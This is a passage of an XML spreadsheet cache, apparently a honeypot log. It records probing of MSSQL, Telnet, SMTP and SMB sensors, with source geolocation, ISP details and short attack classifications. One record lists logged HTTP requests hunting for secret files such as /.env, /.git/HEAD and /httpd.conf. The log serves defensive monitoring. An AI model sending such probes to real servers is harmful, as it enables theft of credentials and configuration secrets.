    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['exploits']}"/>
    <n v="34"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="NP"/>
    <s v="Nepal"/>
    <s v="P7"/>
    <s v="Sudurpashchim Pradesh"/>
    <s v="Kailali"/>
    <s v="Dhangadhi"/>
    <s v="1283467"/>
    <s v="NA"/>
    <s v="28.7014"/>
    <s v="80.5898"/>
    <s v="17501"/>
    <s v="WorldLink Communications"/>
    <s v="WorldLink Communications"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-03-22"/>
    <s v="WLINK_BROADBAND_DYNAMIC_BRAS-BTWL-01_DEFAULT-POOL-CGNAT-BYPASS"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.34.34.171,60827)}&amp;&amp;{Data_SMB:Incoming connection (27.34.34.171,61204)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b22:22ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1219"/>
    <x v="1219"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T13:06:46"/>
    <d v="2024-12-23T21:20:07"/>
    <d v="2025-04-19T13:06:46"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H29"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="07"/>
    <s v="Fars"/>
    <s v="NA"/>
    <s v="Shiraz (District 6)"/>
    <s v="115019"/>
    <s v="NA"/>
    <s v="29.6901"/>
    <s v="52.4613"/>
    <s v="58331"/>
    <s v="Rayaneh Asr-e Ertebat Bam Technology and Engineering Cooperative Co"/>
    <s v="Rayaneh Asr-e Ertebat Bam Technology and Engineering Cooperative Co"/>
    <s v="hosting"/>
    <s v="Rayaneh Asr-e Ertebat Bam Technology and Engineering Cooperative Co"/>
    <s v="2012-06-26"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c1f2:c257"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1220"/>
    <x v="1220"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T13:02:24"/>
    <d v="2025-04-19T13:02:24"/>
    <d v="2025-04-19T13:02:24"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="77"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:605d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and gather information about the available services on the target system, as well as trying to authenticate and potentially gain unauthorized access to various systems. &amp;&amp; The attacker is attempting to scan and exploit various network services, including FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, SMB, SMTP, SNMP, and TELNET. They are also attempting to establish connections with various servers using different protocols."/>
    <s v=" Credential stuffing and brute force attack &amp;&amp; The attacker is likely conducting a reconnaissance phase of an attack, gathering information about the target network's services and potential vulnerabilities."/>
  </r>
  <r>
    <x v="1221"/>
    <x v="1221"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T12:11:40"/>
    <d v="2024-11-26T09:36:28"/>
    <d v="2025-04-19T12:11:40"/>
    <n v="115"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H32"/>
    <s v="25&amp;&amp;NA&amp;&amp;49624&amp;&amp;36124&amp;&amp;51836&amp;&amp;49786"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643743"/>
    <s v="W1B"/>
    <s v="51.5072"/>
    <s v="-0.127586"/>
    <s v="47890"/>
    <s v="UNMANAGED LTD"/>
    <s v="Unmanaged LTD"/>
    <s v="hosting"/>
    <s v="Techoff SRV Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c120:a249"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1222"/>
    <x v="1222"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T12:02:31"/>
    <d v="2025-03-01T13:41:55"/>
    <d v="2025-04-19T12:02:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:f26b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attackers are likely scanning for open ports and vulnerable services, attempting to exploit potential weaknesses in the network. They are also trying to gain unauthorized access by sending malicious login attempts and exploiting weak passwords."/>
    <s v=" Port scanning"/>
  </r>
  <r>
    <x v="1223"/>
    <x v="1223"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T10:41:59"/>
    <d v="2025-04-18T22:01:17"/>
    <d v="2025-04-19T10:41:59"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7282"/>
    <s v="51.4258"/>
    <s v="43754"/>
    <s v="Asiatech Data Transmission company"/>
    <s v="Asiatech Data Transmission company"/>
    <s v="business"/>
    <s v="Asiatech Data Transmission Co."/>
    <s v="2011-10-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8041:b471"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="The attackers are likely attempting to scan and exploit various network services, including FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, SIP, SMB, SMTP, SNMP, and TELNET. They are trying to access or manipulate sensitive data, such as usernames, passwords, and network configurations. &amp;&amp; The attacker is scanning and gathering information about the targeted system, likely for future exploitation. They are sending various types of malicious requests to different services such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SMB, SMTP, SNMP, and TELNET."/>
    <s v="Reconnaissance &amp;&amp; **Port Scanning**"/>
  </r>
  <r>
    <x v="1224"/>
    <x v="1224"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T10:11:36"/>
    <d v="2025-04-16T09:33:37"/>
    <d v="2025-04-19T10:11:36"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Şişli"/>
    <s v="Beyoğlu"/>
    <s v="750640"/>
    <s v="NA"/>
    <s v="41.0693"/>
    <s v="29.0052"/>
    <s v="34984"/>
    <s v="Superonline Iletisim Hizmetleri A.S."/>
    <s v="Superonline R0"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d4fd:8235"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1225"/>
    <x v="1225"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T10:01:17"/>
    <d v="2025-04-17T13:42:16"/>
    <d v="2025-04-19T10:01:17"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="69"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="residential"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:da27:b27a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to gather information about the services running on the target system, likely in preparation for a larger-scale attack. They are sending various probes and requests to each service, including login attempts, connection establishment, and data retrieval. The attacker appears to be using a mix of automated tools and manual efforts to exploit vulnerabilities."/>
    <s v="Port scanning "/>
  </r>
  <r>
    <x v="1226"/>
    <x v="1226"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T10:01:17"/>
    <d v="2025-03-08T10:22:08"/>
    <d v="2025-04-19T10:01:17"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="business"/>
    <s v="Bharti Airtel Limited"/>
    <s v="1986-12-23"/>
    <s v="BHARTI-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:80b9:c416"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="The attacker is attempting to exploit various network services and protocols, likely for reconnaissance, scanning, or exploitation purposes. They are probing different ports and attempting to gain unauthorized access to systems."/>
    <s v=" "/>
  </r>
  <r>
    <x v="1227"/>
    <x v="1227"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T09:09:50"/>
    <d v="2024-06-10T12:29:00"/>
    <d v="2025-04-19T09:09:50"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_MSSQL_H33"/>
    <s v="445&amp;&amp;1433&amp;&amp;65045"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="KS"/>
    <s v="South Kalimantan"/>
    <s v="Kota Banjarmasin"/>
    <s v="Banjarmasin"/>
    <s v="1650213"/>
    <s v="NA"/>
    <s v="-3.31987"/>
    <s v="114.591"/>
    <s v="24532"/>
    <s v="PT. Inet Global Indo"/>
    <s v="INET-ISP"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_SMB:Incoming connection (27.111.36.10,60182)}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b6f:240a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1228"/>
    <x v="1228"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T08:22:49"/>
    <d v="2025-02-14T04:28:47"/>
    <d v="2025-04-19T08:22:49"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Thrissur"/>
    <s v="Thrissur"/>
    <s v="1254187"/>
    <s v="680001"/>
    <s v="10.5276"/>
    <s v="76.2144"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75dd:9945"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1229"/>
    <x v="1229"/>
    <s v="NA&amp;&amp;aq064232.dynamic.ppp.asahi-net.or.jp"/>
    <x v="0"/>
    <d v="2025-04-19T07:10:27"/>
    <d v="2025-04-14T16:54:15"/>
    <d v="2025-04-19T07:10:27"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6916"/>
    <s v="139.768"/>
    <s v="4685"/>
    <s v="Asahi Net"/>
    <s v="ASAHI Net, Inc."/>
    <s v="cellular"/>
    <s v="ASAHI"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc92:40e8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1230"/>
    <x v="1230"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T07:10:23"/>
    <d v="2025-03-20T22:03:59"/>
    <d v="2025-04-19T07:10:23"/>
    <n v="212"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H34"/>
    <s v="25&amp;&amp;80&amp;&amp;3306&amp;&amp;143&amp;&amp;110&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="IDF"/>
    <s v="Île-de-France"/>
    <s v="Paris"/>
    <s v="Paris"/>
    <s v="2988507"/>
    <s v="75000"/>
    <s v="48.8566"/>
    <s v="2.35222"/>
    <s v="52053"/>
    <s v="REDHEBERG Association declaree"/>
    <s v="FBW Reseaux Fibres inc."/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_SMTP:{'arg': '/.git/HEAD', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_SMTP:{'arg': '103.211.202.140', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'keep-alive', 'command': 'CONNECTION:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'gzip', 'command': 'ACCEPT-ENCODING:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': '', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '94.131.8.76', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '95.164.118.29', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '109.123.229.33', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'method': 'GET', 'uri': '/.git/HEAD'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/httpd.conf'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/apps/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/php_info.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/blog/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.production'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/protected/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/config/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': 